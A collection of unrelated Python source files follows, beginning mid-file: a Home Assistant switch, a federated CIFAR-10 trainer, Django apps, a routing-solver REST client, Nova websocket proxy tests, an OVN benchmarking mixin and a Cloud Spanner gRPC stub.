                self._state = state.state == STATE_ON

            # no need to listen for events
        else:
            self.add_template_attribute(
                "_state", self._template, None, self._update_state
            )

        # NOTE(review): when self._template is None this awaits
        # super().async_added_to_hass() a second time — confirm intended.
        await super().async_added_to_hass()

    @property
    def name(self):
        """Return the name of the switch."""
        return self._name

    @property
    def unique_id(self):
        """Return the unique id of this switch."""
        return self._unique_id

    @property
    def is_on(self):
        """Return true if device is on."""
        return self._state

    @property
    def should_poll(self):
        """Return the polling state."""
        return False

    async def async_turn_on(self, **kwargs):
        """Fire the on action."""
        await self._on_script.async_run(context=self._context)
        # Without a state template, assume the action succeeded.
        if self._template is None:
            self._state = True
            self.async_write_ha_state()

    async def async_turn_off(self, **kwargs):
        """Fire the off action."""
        await self._off_script.async_run(context=self._context)
        # Without a state template, assume the action succeeded.
        if self._template is None:
            self._state = False
            self.async_write_ha_state()

    @property
    def assumed_state(self):
        """State is assumed, if no template given."""
        return self._template is None

# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Federated CIFAR-10 classification library using TFF."""

import functools
from typing import Callable, Optional
from absl import logging

import tensorflow as tf
import tensorflow_federated as tff

from fedopt_guide import training_loop
from utils.datasets import cifar10_dataset
from utils.models import resnet_models

# CIFAR images are 32x32 RGB.
CIFAR_SHAPE = (32, 32, 3)
# CIFAR-10 has 10 target classes. The previous value (100) was a CIFAR-100
# leftover and silently built a 100-way classification head for 10-way labels.
NUM_CLASSES = 10


def run_federated(
    iterative_process_builder: Callable[..., tff.templates.IterativeProcess],
    client_epochs_per_round: int,
    client_batch_size: int,
    clients_per_round: int,
    client_datasets_random_seed: Optional[int] = None,
    crop_size: Optional[int] = 24,
    total_rounds: Optional[int] = 1500,
    experiment_name: Optional[str] = 'federated_cifar10',
    root_output_dir: Optional[str] = '/tmp/fed_opt',
    uniform_weighting: Optional[bool] = False,
    **kwargs):
  """Runs an iterative process on the CIFAR-10 classification task.

  This method will load and pre-process dataset and construct a model used for
  the task. It then uses `iterative_process_builder` to create an iterative
  process that it applies to the task, using
  `federated_research.utils.training_loop`.
  We assume that the iterative process has the following functional type
  signatures:
    *   `initialize`: `( -> S@SERVER)` where `S` represents the server state.
    *   `next`: `<S@SERVER, {B*}@CLIENTS> -> <S@SERVER, T@SERVER>` where `S`
        represents the server state, `{B*}` represents the client datasets,
        and `T` represents a python `Mapping` object.
  The iterative process must also have a callable attribute `get_model_weights`
  that takes as input the state of the iterative process, and returns a
  `tff.learning.ModelWeights` object.

  Args:
    iterative_process_builder: A function that accepts a no-arg `model_fn` and
      a client weighting (it is invoked below as
      `iterative_process_builder(tff_model_fn, client_weight_fn)`), and
      returns a `tff.templates.IterativeProcess`. The `model_fn` must return a
      `tff.learning.Model`.
    client_epochs_per_round: An integer representing the number of epochs of
      training performed per client in each training round.
    client_batch_size: An integer representing the batch size used on clients.
    clients_per_round: An integer representing the number of clients
      participating in each round.
    client_datasets_random_seed: An optional int used to seed which clients are
      sampled at each round. If `None`, no seed is used.
    crop_size: An optional integer representing the resulting size of input
      images after preprocessing.
    total_rounds: The number of federated training rounds.
    experiment_name: The name of the experiment being run. This will be appended
      to the `root_output_dir` for purposes of writing outputs.
    root_output_dir: The name of the root output directory for writing
      experiment outputs.
    uniform_weighting: Whether to weigh clients uniformly. If false, clients are
      weighted by the number of samples.
    **kwargs: Additional arguments configuring the training loop. For details on
      supported arguments, see `federated_research/utils/training_utils.py`.
  """

  crop_shape = (crop_size, crop_size, 3)

  # Federated training data, preprocessed per-client.
  cifar_train, _ = cifar10_dataset.get_federated_datasets(
      train_client_epochs_per_round=client_epochs_per_round,
      train_client_batch_size=client_batch_size,
      crop_shape=crop_shape)

  # Centralized test set, used for both validation and final test evaluation.
  _, cifar_test = cifar10_dataset.get_centralized_datasets(
      crop_shape=crop_shape)

  # All clients share the same element spec; use the first one.
  input_spec = cifar_train.create_tf_dataset_for_client(
      cifar_train.client_ids[0]).element_spec

  model_builder = functools.partial(
      resnet_models.create_resnet18,
      input_shape=crop_shape,
      num_classes=NUM_CLASSES)

  loss_builder = tf.keras.losses.SparseCategoricalCrossentropy
  metrics_builder = lambda: [tf.keras.metrics.SparseCategoricalAccuracy()]

  def tff_model_fn() -> tff.learning.Model:
    # Builds a fresh Keras model wrapped for TFF; called once per placement.
    return tff.learning.from_keras_model(
        keras_model=model_builder(),
        input_spec=input_spec,
        loss=loss_builder(),
        metrics=metrics_builder())

  if uniform_weighting:
    client_weight_fn = tff.learning.ClientWeighting.UNIFORM
  else:
    client_weight_fn = tff.learning.ClientWeighting.NUM_EXAMPLES

  training_process = iterative_process_builder(tff_model_fn, client_weight_fn)

  # Uniformly samples `clients_per_round` client datasets each round.
  client_datasets_fn = functools.partial(
      tff.simulation.build_uniform_sampling_fn(
          dataset=cifar_train.client_ids,
          random_seed=client_datasets_random_seed),  # pytype: disable=wrong-keyword-args  # gen-stub-imports
      size=clients_per_round)

  evaluate_fn = tff.learning.build_federated_evaluation(
      tff_model_fn, use_experimental_simulation_loop=True)

  def validation_fn(model_weights, round_num):
    # Validation ignores the round number; evaluates on the full test set.
    del round_num
    return evaluate_fn(model_weights, [cifar_test])

  def test_fn(model_weights):
    return evaluate_fn(model_weights, [cifar_test])

  logging.info('Training model:')
  # Builds a throwaway model purely to log its architecture summary.
  logging.info(model_builder().summary())

  training_loop.run(
      iterative_process=training_process,
      train_client_datasets_fn=client_datasets_fn,
      evaluation_fn=validation_fn,
      test_fn=test_fn,
      total_rounds=total_rounds,
      experiment_name=experiment_name,
      root_output_dir=root_output_dir,
      **kwargs)

#coding=utf-8
from django.db import models
from django.contrib.auth.models import User

class Activity(models.Model):
    """An activity label owned by a user."""
    # Owning user; required (null=False).
    owner = models.ForeignKey(User, null=False)
    # Short, globally unique label for the activity.
    text = models.CharField(max_length=20, unique=True)

class Dessert(models.Model):
    """A dessert entry attached to an activity, with description and photo."""
    # Activity this dessert belongs to; required (null=False).
    activity = models.ForeignKey(Activity, null=False)
    description = models.TextField()
    photo = models.ImageField()

import time

from tsm.common.app import exception

import requests
import json
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter

# URL path root of the KangRouter web service (path component only, no scheme/host).
KANGROUTER_WEBSERVICE_APPLICATION_ROOT="/kangrouter/srv/v1"

class KangRouterClient:
  """Small REST client for the KangRouter vehicle-routing solver service.

  All calls go through a `requests.Session` configured to retry transient
  failures with exponential backoff.
  """
  pathbase = "https://thesolvingmachine.com/kangrouter/srv/v1/solvers"

  def __init__(self, apiKey, licenseId):
    """Store credentials and build a retrying HTTP session.

    Args:
      apiKey: value sent in the `Authorization` header on every request.
      licenseId: license identifier sent as a query parameter on every request.
    """
    self.headers = {"content-type": "application/json",
                    "Authorization": apiKey}
    self.params = {"licenseId": licenseId}
    retries = Retry(total=5,
                    backoff_factor=0.75)
    self.session = requests.Session()
    # Bug fix: `Session.mount` matches adapters by URL prefix. The adapter
    # used to be mounted on the bare path "/kangrouter/srv/v1", which never
    # matches an "https://..." URL, so the retry policy was silently unused.
    # Mount it on the scheme+host prefix that `pathbase` URLs actually share.
    self.session.mount("https://thesolvingmachine.com",
                       HTTPAdapter(max_retries=retries))

  def validateReply(self, req):
    """Translate an HTTP error response into a service exception.

    Returns None when the response is not an error.
    NOTE(review): only statuses 400..500 inclusive are translated; 501-599
    currently pass through silently — confirm this is intended.
    """
    if req.status_code >= 400 and req.status_code <= 500:
      try:
        body = req.json()
      except ValueError:
        # Body is not JSON — surface the raw text and status instead.
        raise exception.InternalError(req.text, req.status_code)
      # Reuse the already-parsed body (it was previously parsed twice).
      raise exception.jsonToException(body)

  def create(self, problem, **kwargs):
    """Submit a new problem; returns the new solver id (response text)."""
    params = self.params.copy()
    params.update(kwargs)
    req = self.session.post(self.pathbase,
                            params=params,
                            headers=self.headers,
                            data=json.dumps(problem))
    self.validateReply(req)
    return req.text

  def delete(self, solverId):
    """Delete a solver instance. Returns True on success."""
    path = "{base}/{solverId}".format(base=self.pathbase,
                                      solverId=str(solverId))
    req = self.session.delete(path,
                              params=self.params,
                              headers=self.headers)
    self.validateReply(req)
    return True

  def stop(self, solverId):
    """Ask a running solver to stop. Returns True on success."""
    path = "{base}/{solverId}/stop".format(base=self.pathbase,
                                           solverId=str(solverId))
    req = self.session.put(path,
                           params=self.params,
                           headers=self.headers)
    self.validateReply(req)
    return True

  def getStatus(self, solverId):
    """Return the solver's status document (parsed JSON)."""
    path = "{base}/{solverId}/status".format(base=self.pathbase,
                                             solverId=str(solverId))
    req = self.session.get(path,
                           params=self.params,
                           headers=self.headers)
    self.validateReply(req)
    return req.json()

  def getSolution(self, solverId):
    """Return the solver's solution document (parsed JSON)."""
    path = "{base}/{solverId}/solution".format(base=self.pathbase,
                                               solverId=str(solverId))
    req = self.session.get(path,
                           params=self.params,
                           headers=self.headers)
    self.validateReply(req)
    return req.json()

  # polling
  def createAndWait(self, problem, cancel, **kwargs):
    """Create a solver and poll once per second (300s budget) for completion.

    Args:
      problem: JSON-serializable problem description.
      cancel: zero-arg callable polled each iteration; truthy aborts the wait.

    Returns:
      The solution document once the solver reports "completed".

    Raises:
      exception.solverError: the service reported the problem invalid.
      exception.InternalError: the 300-second budget was exhausted.
      exception.UserCancelled: `cancel()` returned a truthy value.
    """
    solverId = self.create(problem, **kwargs)
    timeout = 300
    while not cancel() and timeout > 0:
      status = self.getStatus(solverId)
      if status["execStatus"] == "invalid":
        raise exception.solverError(json.dumps(status["errors"]))
      if status["execStatus"] == "completed":
        return self.getSolution(solverId)
      time.sleep(1)
      timeout -= 1
    if timeout == 0:
      raise exception.InternalError("Timed out waiting for solver")
    raise exception.UserCancelled()
    

    

#!/usr/bin/env python

"""Smoke test for the legendary_waffle model API.

Creates a user, a universe, a planet, a building type name, a building
type, and a building, printing each table's contents as it goes.
"""

import os
import sys

import sqlalchemy
# sessionmaker lives in sqlalchemy.orm; importing it explicitly avoids
# relying on "import sqlalchemy" happening to expose the orm submodule.
import sqlalchemy.orm

# Make the repository root importable so that legendary_waffle resolves.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import legendary_waffle

# Database setup: fresh in-memory SQLite schema for every run.
db_engine = sqlalchemy.create_engine("sqlite://")
legendary_waffle.models.MODELBASE.metadata.create_all(db_engine)
legendary_waffle.models.MODELBASE.metadata.bind = db_engine
db_session = sqlalchemy.orm.sessionmaker(bind=db_engine)
db = db_session()

# Create the user
legendary_waffle.model_create(db, legendary_waffle.models.User, name='sk4ly')
print("Users: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.User)))

# Create the universe
universe_config = {
    "name": 'poopiverse',
    "map_size": 1000,
    "max_planets": 1000,
    "max_players": 10
}
legendary_waffle.model_create(db, legendary_waffle.models.Universe, **universe_config)
print("Universe: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.Universe)))

# Create the planet
planet_config = {
    "universe": 1, # The pkid of the universe 'poopiverse'
    "coordinate_x": 1,
    "coordinate_y": 1,
    "name": 'bloth',
    "habitable": True,
    "player_control": 1, # The pkid of user 'sk4ly'
    "default_condition": 1000,
    "default_resources": 1000,
    "current_condition": 1000,
    "current_resources": 1000
}
legendary_waffle.model_create(db, legendary_waffle.models.Planet, **planet_config)
print("Planet: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.Planet)))

# Create building type name
legendary_waffle.model_create(db, legendary_waffle.models.BuildingTypeName, name="Control Center")
print("Building Type Name: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.BuildingTypeName)))

# Create building type
building_type_config = {
    "typename": 1, # The pkid of the building type name 'Control Center'
    "description": "This is the control center",
    "default_condition": 100,
    "default_firepower": 0,
    "default_storage": 100,
    "rhr_passive": 0,
    "rhr_active": 0,
    "rhr_destructive": 0,
    "build_resource_reqs": 500,
}
legendary_waffle.model_create(db, legendary_waffle.models.BuildingType, **building_type_config)
print("Building Type: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.BuildingType)))

# Now create our new building
building_config = {
    "building_type": 1, # The pkid of the building type with the name 'Control Center'
    "universe": 1, # The pkid of the universe 'poopiverse'
    "planet": 1, # The pkid of the planet 'bloth'
    "player_control": 1, # The pkid of the user 'sk4ly'
}
legendary_waffle.model_create(db, legendary_waffle.models.Building, **building_config)
print("Building: {}".format(legendary_waffle.model_read(db, legendary_waffle.models.Building)))

"""heroku_blog URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.conf.urls import url, include
    2. Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from blog.views import index, signup, login, logout

# Each view pattern is anchored with '$' so that, e.g., '/signup-bogus'
# no longer matches the signup view — the original unanchored prefixes
# matched ANY path beginning with the name.  The admin pattern stays a
# bare prefix because include() requires it.
urlpatterns = [
    url(r'^$', index, name='index'),
    url(r'^signup$', signup, name='signup'),
    url(r'^login$', login, name='login'),
    url(r'^logout$', logout, name='logout'),
    url(r'^admin/', include(admin.site.urls)),
]

# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""Tests for nova websocketproxy."""


import mock

from nova.console import websocketproxy
from nova import exception
from nova import test


class NovaProxyRequestHandlerBaseTestCase(test.TestCase):
    """Tests for NovaProxyRequestHandlerBase.new_websocket_client.

    The handler's socket/msg/do_proxy/headers collaborators are replaced
    with MagicMocks, and the consoleauth token check is patched per test,
    so only the handler's own logic is exercised.
    """

    def setUp(self):
        super(NovaProxyRequestHandlerBaseTestCase, self).setUp()

        # Stub out every collaborator the handler touches; each test only
        # drives new_websocket_client() and inspects these mocks.
        self.wh = websocketproxy.NovaProxyRequestHandlerBase()
        self.wh.socket = mock.MagicMock()
        self.wh.msg = mock.MagicMock()
        self.wh.do_proxy = mock.MagicMock()
        self.wh.headers = mock.MagicMock()

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client(self, check_token):
        # Valid token in the ws:// query string: connect and proxy.
        check_token.return_value = {
            'host': 'node1',
            'port': '10000'
        }
        self.wh.socket.return_value = '<socket>'
        self.wh.path = "ws://127.0.0.1/?token=123-456-789"

        self.wh.new_websocket_client()

        check_token.assert_called_with(mock.ANY, token="123-456-789")
        self.wh.socket.assert_called_with('node1', 10000, connect=True)
        self.wh.do_proxy.assert_called_with('<socket>')

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_token_invalid(self, check_token):
        # Rejected token must raise InvalidToken rather than proxying.
        check_token.return_value = False

        self.wh.path = "ws://127.0.0.1/?token=XXX"

        self.assertRaises(exception.InvalidToken,
                          self.wh.new_websocket_client)
        check_token.assert_called_with(mock.ANY, token="XXX")

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_novnc(self, check_token):
        # noVNC flow: no token in the URL, so it is read from the headers.
        check_token.return_value = {
            'host': 'node1',
            'port': '10000'
        }
        self.wh.socket.return_value = '<socket>'
        self.wh.path = "http://127.0.0.1/"
        self.wh.headers.getheader.return_value = "token=123-456-789"

        self.wh.new_websocket_client()

        check_token.assert_called_with(mock.ANY, token="123-456-789")
        self.wh.socket.assert_called_with('node1', 10000, connect=True)
        self.wh.do_proxy.assert_called_with('<socket>')

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_novnc_token_invalid(self, check_token):
        # noVNC flow with a rejected header token raises InvalidToken.
        check_token.return_value = False

        self.wh.path = "http://127.0.0.1/"
        self.wh.headers.getheader.return_value = "token=XXX"

        self.assertRaises(exception.InvalidToken,
                          self.wh.new_websocket_client)
        check_token.assert_called_with(mock.ANY, token="XXX")

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_internal_access_path(self, check_token):
        # With an internal_access_path, the handler must first complete an
        # HTTP CONNECT-style handshake (200 OK) before proxying the socket.
        check_token.return_value = {
            'host': 'node1',
            'port': '10000',
            'internal_access_path': 'vmid'
        }

        tsock = mock.MagicMock()
        tsock.recv.return_value = "HTTP/1.1 200 OK\r\n\r\n"

        self.wh.socket.return_value = tsock
        self.wh.path = "ws://127.0.0.1/?token=123-456-789"

        self.wh.new_websocket_client()

        check_token.assert_called_with(mock.ANY, token="123-456-789")
        self.wh.socket.assert_called_with('node1', 10000, connect=True)
        self.wh.do_proxy.assert_called_with(tsock)

    @mock.patch('nova.consoleauth.rpcapi.ConsoleAuthAPI.check_token')
    def test_new_websocket_client_internal_access_path_err(self, check_token):
        # A non-200 handshake response must abort with an exception.
        check_token.return_value = {
            'host': 'node1',
            'port': '10000',
            'internal_access_path': 'xxx'
        }

        tsock = mock.MagicMock()
        tsock.recv.return_value = "HTTP/1.1 500 Internal Server Error\r\n\r\n"

        self.wh.socket.return_value = tsock
        self.wh.path = "ws://127.0.0.1/?token=123-456-789"

        self.assertRaises(Exception, self.wh.new_websocket_client)  # noqa
        check_token.assert_called_with(mock.ANY, token="123-456-789")

# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2018  Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq add rack --bunker`."""

from aquilon.worker.broker import BrokerCommand  # pylint: disable=W0611
from aquilon.worker.commands.add_rack import CommandAddRack


class CommandAddRackBunker(CommandAddRack):
    """Handle `aq add rack --bunker`.

    All behaviour is inherited from CommandAddRack; this variant only
    requires the bunker name plus the rack's row and column.
    """

    required_parameters = ["bunker", "row", "column"]

# Copyright 2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import netaddr

from rally.common import logging
from rally.common.utils import RandomNameGeneratorMixin

from rally_ovs.plugins.ovs import ovsclients
from rally_ovs.plugins.ovs import utils


LOG = logging.getLogger(__name__)


class OvnClientMixin(ovsclients.ClientsMixin, RandomNameGeneratorMixin):
    """Helpers shared by OVN scenarios.

    Provides an ovn-nbctl client bound to the controller sandbox and bulk
    operations for creating logical switches/routers and wiring networks
    to routers, all driven through that client's batch mode.
    """

    def _get_ovn_controller(self, install_method="sandbox"):
        """Return an ovn-nbctl client bound to the controller sandbox.

        The daemon socket, when present, is taken from the scenario
        context.
        """
        ovn_nbctl = self.controller_client("ovn-nbctl")
        ovn_nbctl.set_sandbox("controller-sandbox", install_method,
                              self.context['controller']['host_container'])
        ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
        return ovn_nbctl

    def _start_daemon(self):
        """Start the ovn-nbctl daemon; returns whatever start_daemon does."""
        ovn_nbctl = self._get_ovn_controller(self.install_method)
        return ovn_nbctl.start_daemon()

    def _stop_daemon(self):
        """Stop the ovn-nbctl daemon."""
        ovn_nbctl = self._get_ovn_controller(self.install_method)
        ovn_nbctl.stop_daemon()

    def _restart_daemon(self):
        """Stop then start the ovn-nbctl daemon."""
        self._stop_daemon()
        return self._start_daemon()

    def _create_lswitches(self, lswitch_create_args, num_switches=-1):
        """Create logical switches in batches.

        Args:
            lswitch_create_args: dict with optional keys "amount", "batch",
                "start_cidr", "mcast_snoop", "mcast_idle_timeout" and
                "mcast_table_size".
            num_switches: how many switches to create; -1 (the default)
                means use lswitch_create_args["amount"].

        Returns:
            List of lswitch dicts from ovn-nbctl; when start_cidr is given
            each entry is annotated with its "cidr".
        """
        self.RESOURCE_NAME_FORMAT = "lswitch_XXXXXX_XXXXXX"

        if num_switches == -1:
            num_switches = lswitch_create_args.get("amount", 1)
        # Commands are flushed to ovn-nbctl every `batch` switches.
        batch = lswitch_create_args.get("batch", num_switches)

        start_cidr = lswitch_create_args.get("start_cidr", "")
        if start_cidr:
            start_cidr = netaddr.IPNetwork(start_cidr)

        mcast_snoop = lswitch_create_args.get("mcast_snoop", "true")
        mcast_idle = lswitch_create_args.get("mcast_idle_timeout", 300)
        mcast_table_size = lswitch_create_args.get("mcast_table_size", 2048)

        LOG.info("Create lswitches method: %s" % self.install_method)
        ovn_nbctl = self._get_ovn_controller(self.install_method)
        ovn_nbctl.enable_batch_mode()

        flush_count = batch
        lswitches = []
        for i in range(num_switches):
            # Name the switch after its subnet when a start CIDR is given;
            # otherwise use a random name.  (The original generated a random
            # name unconditionally and immediately overwrote it in the CIDR
            # branch, wasting a call to the name generator.)
            if start_cidr:
                cidr = start_cidr.next(i)
                name = "lswitch_%s" % cidr
            else:
                name = self.generate_random_name()

            other_cfg = {
                'mcast_snoop': mcast_snoop,
                'mcast_idle_timeout': mcast_idle,
                'mcast_table_size': mcast_table_size
            }

            lswitch = ovn_nbctl.lswitch_add(name, other_cfg)
            if start_cidr:
                lswitch["cidr"] = cidr

            LOG.info("create %(name)s %(cidr)s" %
                     {"name": name, "cidr": lswitch.get("cidr", "")})
            lswitches.append(lswitch)

            flush_count -= 1
            if flush_count < 1:
                ovn_nbctl.flush()
                flush_count = batch

        ovn_nbctl.flush()  # ensure all commands be run
        ovn_nbctl.enable_batch_mode(False)
        return lswitches

    def _create_routers(self, router_create_args):
        """Create logical routers in batches.

        Args:
            router_create_args: dict with optional keys "amount" (number of
                routers, default 1) and "batch" (flush interval, default 1).

        Returns:
            List of lrouter dicts from ovn-nbctl.
        """
        self.RESOURCE_NAME_FORMAT = "lrouter_XXXXXX_XXXXXX"

        amount = router_create_args.get("amount", 1)
        batch = router_create_args.get("batch", 1)

        ovn_nbctl = self._get_ovn_controller(self.install_method)
        ovn_nbctl.enable_batch_mode()

        flush_count = batch
        lrouters = []

        for i in range(amount):
            name = self.generate_random_name()
            lrouter = ovn_nbctl.lrouter_add(name)
            lrouters.append(lrouter)

            flush_count -= 1
            if flush_count < 1:
                ovn_nbctl.flush()
                flush_count = batch

        ovn_nbctl.flush()  # ensure all commands be run
        ovn_nbctl.enable_batch_mode(False)

        return lrouters

    def _connect_network_to_router(self, router, network):
        """Attach one network (lswitch) to a router.

        Adds a router port with a MAC derived from the task UUID, then a
        switch port of type "router" pointing back at it.
        """
        LOG.info("Connect network %s to router %s" % (network["name"], router["name"]))

        ovn_nbctl = self.controller_client("ovn-nbctl")
        ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
                              self.context['controller']['host_container'])
        ovn_nbctl.enable_batch_mode(False)

        # Derive a deterministic MAC from the task UUID; masking the first
        # octet with 254 clears its lowest bit (the multicast bit), and the
        # last three octets are zeroed.  hex() already returns a str, so
        # the original str(hex(...)) wrapper was redundant.
        base_mac = [i[:2] for i in self.task["uuid"].split('-')]
        base_mac[0] = hex(int(base_mac[0], 16) & 254)
        base_mac[3:] = ['00'] * 3
        mac = utils.get_random_mac(base_mac)

        ovn_nbctl.lrouter_port_add(router["name"], network["name"], mac,
                                   str(network["cidr"]))
        ovn_nbctl.flush()

        switch_router_port = "rp-" + network["name"]
        ovn_nbctl.lswitch_port_add(network["name"], switch_router_port)
        # NOTE(review): the OVN NB schema column is usually spelled
        # 'addresses' — confirm 'address' is what this client wrapper
        # expects before changing it.
        ovn_nbctl.db_set('Logical_Switch_Port', switch_router_port,
                         ('options', {"router-port": network["name"]}),
                         ('type', 'router'),
                         ('address', 'router'))
        ovn_nbctl.flush()

    def _connect_networks_to_routers(self, lnetworks, lrouters, networks_per_router):
        """Give each router the next `networks_per_router` networks.

        Networks are consumed from the front of `lnetworks`, so routers get
        disjoint slices; later routers get fewer (or none) if the list runs
        short.
        """
        for lrouter in lrouters:
            LOG.info("Connect %s networks to router %s" % (networks_per_router, lrouter["name"]))
            for lnetwork in lnetworks[:networks_per_router]:
                LOG.info("connect networks %s cidr %s" % (lnetwork["name"], lnetwork["cidr"]))
                self._connect_network_to_router(lrouter, lnetwork)

            lnetworks = lnetworks[networks_per_router:]

# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc

from google.cloud.spanner_v1.proto import (
    result_set_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2,
)
from google.cloud.spanner_v1.proto import (
    spanner_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2,
)
from google.cloud.spanner_v1.proto import (
    transaction_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2


class SpannerStub(object):
    """Cloud Spanner API

  The Cloud Spanner API can be used to manage sessions and execute
  transactions on data stored in Cloud Spanner databases.
  """

    # NOTE(review): generated by the gRPC Python protocol compiler (see the
    # file header) — do not hand-edit; regenerate from spanner.proto.

    def __init__(self, channel):
        """Constructor.

    Args:
      channel: A grpc.Channel.
    """
        # One callable per RPC; unary_unary for request/response methods,
        # unary_stream for the streaming result-set methods.
        self.CreateSession = channel.unary_unary(
            "/google.spanner.v1.Spanner/CreateSession",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CreateSessionRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.Session.FromString,
        )
        self.BatchCreateSessions = channel.unary_unary(
            "/google.spanner.v1.Spanner/BatchCreateSessions",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BatchCreateSessionsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BatchCreateSessionsResponse.FromString,
        )
        self.GetSession = channel.unary_unary(
            "/google.spanner.v1.Spanner/GetSession",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.GetSessionRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.Session.FromString,
        )
        self.ListSessions = channel.unary_unary(
            "/google.spanner.v1.Spanner/ListSessions",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ListSessionsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ListSessionsResponse.FromString,
        )
        self.DeleteSession = channel.unary_unary(
            "/google.spanner.v1.Spanner/DeleteSession",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.DeleteSessionRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.ExecuteSql = channel.unary_unary(
            "/google.spanner.v1.Spanner/ExecuteSql",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteSqlRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.ResultSet.FromString,
        )
        self.ExecuteStreamingSql = channel.unary_stream(
            "/google.spanner.v1.Spanner/ExecuteStreamingSql",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteSqlRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.PartialResultSet.FromString,
        )
        self.ExecuteBatchDml = channel.unary_unary(
            "/google.spanner.v1.Spanner/ExecuteBatchDml",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteBatchDmlRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ExecuteBatchDmlResponse.FromString,
        )
        self.Read = channel.unary_unary(
            "/google.spanner.v1.Spanner/Read",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ReadRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.ResultSet.FromString,
        )
        self.StreamingRead = channel.unary_stream(
            "/google.spanner.v1.Spanner/StreamingRead",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.ReadRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.PartialResultSet.FromString,
        )
